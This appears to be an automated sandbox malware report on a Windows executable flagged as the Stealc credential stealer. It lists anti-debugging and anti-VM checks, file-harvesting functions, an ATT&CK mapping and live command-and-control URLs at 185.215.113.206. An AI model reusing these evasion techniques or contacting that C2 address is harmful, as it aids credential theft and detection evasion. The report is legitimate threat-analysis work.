                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276B6C second address: 1276B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276B75 second address: 1276B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276CEF second address: 1276D26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209552h 0x00000007 jmp 00007F5C21209557h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12770D5 second address: 12770D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127723B second address: 1277251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5C2120954Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1277251 second address: 1277255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12773B2 second address: 12773B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12773B8 second address: 12773D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F5C20C5AC36h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5C20C5AC41h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1277536 second address: 127753A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127C994 second address: 127C99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B4A second address: 1294B50 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B50 second address: 1294B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5C20C5AC36h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B5E second address: 1294B64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B64 second address: 1294B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B71 second address: 1294B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B77 second address: 1294B97 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F5C20C5AC46h 0x00000010 jmp 00007F5C20C5AC40h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B97 second address: 1294B9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294B9E second address: 1294BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jc 00007F5C20C5AC36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12973D4 second address: 12973F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209558h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12973F4 second address: 1297403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F5C20C5AC36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1297403 second address: 1297407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1297407 second address: 129740B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129740B second address: 129744A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F5C21209546h 0x0000000f jmp 00007F5C21209550h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5C21209556h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129744A second address: 129744E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129744E second address: 1297457 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1297457 second address: 1297464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5C20C5AC36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1297464 second address: 1297477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5C21209546h 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F5C21209546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7174 second address: 12A7178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7BD9 second address: 12A7C07 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5C21209552h 0x00000008 jc 00007F5C21209548h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F5C2120954Eh 0x0000001a jc 00007F5C21209546h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7C07 second address: 12A7C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5C20C5AC36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A7EB1 second address: 12A7EB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF436 second address: 12AF43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF43C second address: 12AF440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF440 second address: 12AF444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF444 second address: 12AF491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5C21209551h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnp 00007F5C21209552h 0x00000018 jl 00007F5C2120954Ch 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F5C21209557h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF491 second address: 12AF495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF495 second address: 12AF49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF49B second address: 12AF4A5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5C20C5AC3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0DDF second address: 12B0E06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5C2120954Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5C21209552h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0E06 second address: 12B0E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404A3 second address: 16404A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404A9 second address: 16404DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5C20C5AC48h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushad 0x00000012 movzx ecx, di 0x00000015 mov ah, bh 0x00000017 popad 0x00000018 mov dl, ch 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404DE second address: 16404E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404E2 second address: 16404E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1640545 second address: 164054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 164054B second address: 1640564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5C20C5AC3Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1640564 second address: 1640573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C2120954Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1BAA second address: 11D1BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1DA4 second address: 11D1DAE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5C21209546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C40A4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11EB851 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11CD6E4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37668
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D440F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31160 GetSystemInfo,ExitProcess,0_2_00D31160
                Source: file.exe, file.exe, 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1765760995.00000000016D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36484
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36495
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36481
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36503
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36369
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36535
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D34610 VirtualProtect ?,00000004,00000100,000000000_2_00D34610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49AA0 mov eax, dword ptr fs:[00000030h]0_2_00D49AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00D47690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6828, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00D49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00D498E0
                Source: file.exe, file.exe, 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: U|Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D77588 cpuid 0_2_00D77588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00D47D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00D46BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00D479E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00D47BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.phpSfile.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
